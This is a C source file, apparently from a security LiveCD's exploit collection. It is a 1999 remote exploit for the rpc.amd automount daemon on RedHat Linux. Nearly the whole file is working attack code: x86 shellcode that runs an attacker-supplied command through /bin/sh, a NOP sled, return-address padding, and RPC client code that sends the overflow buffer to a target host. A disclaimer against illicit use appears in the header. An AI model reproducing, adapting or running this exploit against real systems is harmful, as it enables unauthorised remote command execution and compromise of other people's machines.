home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / remote / SDIamd.c < prev    next >
Encoding:
C/C++ Source or Header  |  2005-02-12  |  7.2 KB  |  344 lines
  1. /* 
  2.  * SDI rpc.AMD automountd remote exploit for RedHat Linux
  3.  * Sekure SDI - Brazilian Information Security Team
  4.  * by c0nd0r <condor@sekure.org> - Jul/99
  5.  *  
  6.  * AMD doesn't check bounds in the plog() function, so we may
  7.  * call the procedure 7 and exploit this vulnerability.
  8.  * It has been tested under rh5.2/5.0 but this vulnerability exists in 
  9.  * all versions.
  10.  * 
  11.  * Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo),
  12.  *         vader, fcon, slide, corb, soft distortion and specially to
  13.  *         my sasazita!  Also lots of thanks to toxyn.org(frawd,r00t),
  14.  *         pulhas.org, phibernet, superbofh(seti) and el8.org (duke). 
  15.  *         #uground (brasnet), #sdi(efnet), #(phibernet).
  16.  *           
  17.  * usage: SDIamd -h <host> -c <command> [-p <port>] [-o <offset>]
  18.  *        where -p <port> will bypass the portmap.
  19.  * 
  20.  * Warning: We take no responsability for the consequences on using this 
  21.  *          tool. DO NOT USE FOR ILICIT ACTIVITIES!
  22.  *
  23.  * Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira
  24.  * de seguranca - BOS-BR <bos-br-request@sekure.org>. Fiquem ligado na
  25.  * nova pagina do grupo!
  26.  */ 
  27.  
  28. #include <stdio.h>
  29. #include <unistd.h>
  30. #include <string.h>
  31. #include <netdb.h>
  32. #include <rpc/rpc.h>
  33. #include <sys/time.h>
  34. #include <sys/types.h>
  35. #include <sys/socket.h>
  36.  
  37. #define AMQ_PROGRAM ((u_long)300019)
  38. #define AMQ_VERSION ((u_long)1)
  39. #define AMQPROC_MOUNT ((u_long)7)
  40. #define AMQ_STRLEN 1024
  41. #define XDRPROC_T_TYPE xdrproc_t
  42. #define voidp void *
  43. #define NOP 0x90
  44.  
  45. char shellcode[] =
  46.         "\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
  47.         "\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
  48.         "\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
  49.         "\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
  50.         "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c ";
  51.  
  52. //typedef bool_t (*xdrproc_t) __P ((XDR *, __ptr_t, ...));
  53. typedef char *amq_string;
  54. typedef long *time_type;
  55. typedef struct amq_mount_tree amq_mount_tree;
  56. typedef amq_mount_tree *amq_mount_tree_p;
  57.  
  58. struct amq_mount_tree {
  59.   amq_string mt_mountinfo;
  60.   amq_string mt_directory;
  61.   amq_string mt_mountpoint;
  62.   amq_string mt_type;
  63.   time_type mt_mounttime;
  64.   u_short mt_mountuid;
  65.   int mt_getattr;
  66.   int mt_lookup;
  67.   int mt_readdir;
  68.   int mt_readlink;
  69.   int mt_statfs;
  70.   struct amq_mount_tree *mt_next;
  71.   struct amq_mount_tree *mt_child;
  72. };
  73.  
  74. bool_t
  75. xdr_amq_string(XDR *xdrs, amq_string *objp)
  76. {
  77.   if (!xdr_string(xdrs, objp, AMQ_STRLEN)) {
  78.     return (FALSE);
  79.   }
  80.   return (TRUE);
  81. }
  82.  
  83. bool_t
  84. xdr_time_type(XDR *xdrs, time_type *objp)
  85. {
  86.   if (!xdr_long(xdrs, (long *) objp)) {
  87.     return (FALSE);
  88.   }
  89.   return (TRUE);
  90. }
  91.  
  92. bool_t
  93. xdr_amq_mount_tree(XDR *xdrs, amq_mount_tree *objp)
  94. {
  95.  
  96.   if (!xdr_amq_string(xdrs, &objp->mt_mountinfo)) {
  97.     return (FALSE);
  98.   }
  99.  
  100.   if (!xdr_amq_string(xdrs, &objp->mt_directory)) {
  101.     return (FALSE);
  102.   }
  103.  
  104.   if (!xdr_amq_string(xdrs, &objp->mt_mountpoint)) {
  105.     return (FALSE);
  106.   }
  107.  
  108.   if (!xdr_amq_string(xdrs, &objp->mt_type)) {
  109.     return (FALSE);
  110.   }
  111.  
  112.   if (!xdr_time_type(xdrs, &objp->mt_mounttime)) {
  113.     return (FALSE);
  114.   }
  115.  
  116.   if (!xdr_u_short(xdrs, &objp->mt_mountuid)) {
  117.     return (FALSE);
  118.   }
  119.  
  120.   if (!xdr_int(xdrs, &objp->mt_getattr)) {
  121.     return (FALSE);
  122.   }
  123.  
  124.   if (!xdr_int(xdrs, &objp->mt_lookup)) {
  125.     return (FALSE);
  126.   }
  127.  
  128.   if (!xdr_int(xdrs, &objp->mt_readdir)) {
  129.     return (FALSE);
  130.   }
  131.  
  132.   if (!xdr_int(xdrs, &objp->mt_readlink)) {
  133.     return (FALSE);
  134.   }
  135.  
  136.   if (!xdr_int(xdrs, &objp->mt_statfs)) {
  137.     return (FALSE);
  138.   }
  139.  
  140.   if (!xdr_pointer(xdrs, (char **) &objp->mt_next, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
  141.     return (FALSE);
  142.   }
  143.  
  144.   if (!xdr_pointer(xdrs, (char **) &objp->mt_child, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
  145.     return (FALSE);
  146.   }
  147.  
  148.   return (TRUE);
  149. }
  150.  
  151. bool_t
  152. xdr_amq_mount_tree_p(XDR *xdrs, amq_mount_tree_p *objp)
  153. {
  154.   if (!xdr_pointer(xdrs, (char **) objp, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) {
  155.     return (FALSE);
  156.   }
  157.   return (TRUE);
  158. }
  159.  
  160.  
  161. int usage ( char *arg) {
  162.   printf ( "Sekure SDI - AMD remote exploit for linux\n");
  163.   printf ( "usage: %s -h <host> -c <command> [-o <offset>] [-p <port>] [-u] \n", arg);
  164.   printf ( " where: [port] will bypass portmap\n");
  165.   printf ( "        [-u  ] will use udp instead of tcp\n");
  166.   exit (0);
  167. }
  168.  
  169.  
  170. int *amqproc_mount_1(voidp argp, CLIENT *clnt);
  171.  
  172.  
  173. int main ( int argc, char *argv[] ) {
  174.   CLIENT *cl;
  175.   struct timeval tv;
  176.   struct sockaddr_in sa;
  177.   struct hostent *he; 
  178.   char buf[8000], *path = buf, comm[200], *host, *cc;
  179.   int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0;  
  180.   long addr = 0xbffff505;
  181.  
  182.   while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1)
  183.     switch (c) {
  184.     case 'h':
  185.       host = optarg;
  186.       break;
  187.  
  188.     case 'p':
  189.       port = atoi(optarg);
  190.       break;
  191.  
  192.     case 'c':
  193.       cc = optarg;
  194.       break;
  195.  
  196.     case 'o':
  197.       offset = atoi ( optarg);
  198.       break;
  199.  
  200.     case 'u':
  201.       udp = 1;
  202.       break;
  203.  
  204.     default:
  205.       damn = 1;
  206.       break;
  207.    }
  208.  
  209.   if (!host || !cc || damn) usage ( argv[0]);
  210.  
  211.   sa.sin_family = AF_INET;
  212.   he = gethostbyname ( host);
  213.   if (!he) {
  214.    if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) {
  215.     printf ( "unknown host, try again pal!\n");
  216.     exit ( 0);
  217.    }
  218.   } else 
  219.    bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); 
  220.   sa.sin_port = htons(port);
  221.   sd = RPC_ANYSOCK;
  222.   tv.tv_sec = 10;
  223.   tv.tv_usec = 0;
  224.  
  225.   snprintf ( comm, sizeof(comm), "%s", cc);
  226.   if ( strlen(comm) >= 160) {
  227.     printf ( "command too long\n");
  228.     exit (0);
  229.   } else {
  230.    comm[strlen(comm)] = ';';
  231.    for ( x = strlen(comm); x < 160; x++)
  232.     comm[x] = 'A'; 
  233.   }  
  234.  
  235.   addr += offset;
  236.   for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++)
  237.    buf[x] = NOP;
  238.  
  239.   for ( y = 0; y < strlen(shellcode); x++, y++)
  240.    buf[x] = shellcode[y];
  241.  
  242.   for ( y = 0; y < strlen(comm); x++, y++)
  243.    buf[x] = comm[y];  
  244.  
  245.   printf ( "SDI automountd remote exploit for linux\n");
  246.   printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset); 
  247.  
  248.   for ( ; x < 1020; x+=4) {
  249.    buf[x  ] = (addr & 0x000000ff);
  250.    buf[x+1] = (addr & 0x0000ff00) >> 8;
  251.    buf[x+2] = (addr & 0x00ff0000) >> 16;
  252.    buf[x+3] = (addr & 0xff000000) >> 24;
  253.   }
  254.  
  255.   buf[strlen(buf)] = '\0';  
  256.   
  257.   if (!udp) {
  258.    if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) ==
  259.         NULL)
  260.    {
  261.      clnt_pcreateerror("clnt_create");
  262.      exit (-1);
  263.    }
  264.   } else {
  265.    if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) ==
  266.        NULL)
  267.    {
  268.      clnt_pcreateerror("clnt_create");
  269.      exit (-1);
  270.    }
  271.   }
  272.   printf ( "PORT %d \n", ntohs(sa.sin_port));
  273.   printf ( "Command: %s \n", cc); 
  274.  
  275.   amqproc_mount_1 (&path, cl); 
  276.   
  277.   clnt_destroy ( cl);
  278.   
  279. }
  280.  
  281.   
  282. int *
  283. amqproc_mount_1(voidp argp, CLIENT *clnt)
  284. {
  285.   static int res;
  286.   struct timeval TIMEOUT = {10, 0};
  287.  
  288.   memset((char *) &res, 0, sizeof(res));
  289.   if (clnt_call(clnt, AMQPROC_MOUNT, (XDRPROC_T_TYPE) xdr_amq_string, argp,
  290.                 (XDRPROC_T_TYPE) xdr_int, (caddr_t) & res,
  291.                 TIMEOUT) != RPC_SUCCESS) {
  292.     printf ( "voce e' um hax0r!\n");
  293.     printf ( "don't forget to restart amd: /etc/rc.d/init.d/amd start\n");
  294.     clnt_perror ( clnt, "clnt_call");
  295.     return (NULL);
  296.   } 
  297.   printf ( "exploit failed\n");
  298.   return (&res);
  299. }
  300.  
  301.  
  302.  
  303.  
  304.  
  305.  
  306.  
  307.  
  308.  
  309.  
  310.  
  311.  
  312.  
  313.  
  314.  
  315.  
  316.  
  317.  
  318.  
  319.  
  320.  
  321.  
  322.  
  323.  
  324.  
  325.  
  326.  
  327.  
  328.  
  329.  
  330.  
  331.  
  332.  
  333.  
  334.  
  335.  
  336.  
  337.  
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344.